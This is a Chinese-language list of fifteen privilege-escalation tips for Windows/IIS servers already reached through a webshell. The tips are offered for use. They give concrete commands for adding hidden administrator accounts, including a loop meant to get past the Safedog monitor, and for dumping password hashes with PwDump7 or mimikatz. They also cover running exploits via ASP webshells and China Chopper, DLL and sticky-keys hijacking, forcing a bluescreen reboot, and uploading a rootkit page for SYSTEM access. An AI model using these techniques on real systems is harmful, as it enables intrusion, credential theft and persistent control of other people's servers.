提權的技巧分享:
1.cmd拒絕訪問就自己上傳一個cmd.exe,自己上傳的cmd是不限制后綴的,還可以是 cmd.com cmd.txt cmd.rar等
2.net user不能執行有時候是net.exe被刪除了,可以先試試net1,不行就自己上 傳一個net.exe
3.cmd執行exp沒回顯的解決方法:com路徑那里輸入exp路徑 C:\RECYCLER\pr.exe,命令那里清空(包括/c )輸入net user jianmei daxia /add
4.有時候因為監控而添加用戶失敗,試試上傳抓取hash的工具,如PwDump7.exe,得 到hash之后可以進行破解,建議重定向結果到保存為1.txt cmd /c c:\windows\temp\cookies\PwDump7.exe >1.txt,在條件允許的情況下 也可以用mimikatz直接抓明文
5.有時候權限很松,很多命令都可以執行,但是就是增加不上用戶,這時候你就要考 慮是不是因為密碼過於簡單或是過於復雜了
6.用wt.asp掃出來的目錄,其中紅色的文件可以替換成exp,執行命令時cmd那里輸 入替換的文件路徑,下面清空雙引號加增加用戶的命令
7.有時候可以添加用戶,但是添加不到管理組,有可能是administrators組改名 了,使用命令net user administrator查看管理組的名字
8.有的cmd執行很變態,asp馬里,cmd路徑填上面,下面填:"c:\xxx\exp.exe whoami” 記得前面加兩個雙引號,不行后面也兩個,不行就把exp的路徑放在cmd那 里,下面不變
9.當添加不上用戶卻可以添加“增加用戶的Vbs、bat)的時候,就添加一個吧,然后 用“直接使服務器藍屏重啟的東東”讓服務器重啟就提權成功
10.菜刀執行的技巧,上傳cmd到可執行目錄,右擊cmd 虛擬終端,help 然后setp c:\windows\temp\cmd.exe 設置終端路徑為:c:\windows\temp\cmd.exe
11.支持aspx但跨不了目錄的時候,可以上傳一個讀iis的vbs,執行命令列出所有網 站目錄,找到主站的目錄就可以跨過去了,上傳cscript.exe到可執行目錄, 接着上傳iispwd.vbs到網站根目錄,cmd命令cmd /c “c:\windows\temp\cookies\cscript.exe” d:\web\iispwd.vbs 11.如何辨別服務器是不是內網?192.168.x.x 172.16.x.x 10.x.x.x
12.安全狗下加用戶的語句::for /l %i in (1,1,1000) do @net user test test [/add&@net]() localgroup administrators test /add
13.21對應的FTP、1433對應的MSSQL、3306對應的MYSQL、3389對應的遠程桌面、 1521對應的Oracle、5631對應的pcanywhere
14.劫持提權,說到這個,想必肯定會想到lpk.dll這類工具,有時候在蛋疼怎么都 加不上賬戶的時候,可以試試劫持shift、添加開機啟動等等思路
15.提權成功但3389端口沒開,執行語句或是工具開3389失敗的時候,可以上傳 rootkit.asp,登陸進去就是system權限,這時候再嘗試開3389希望較大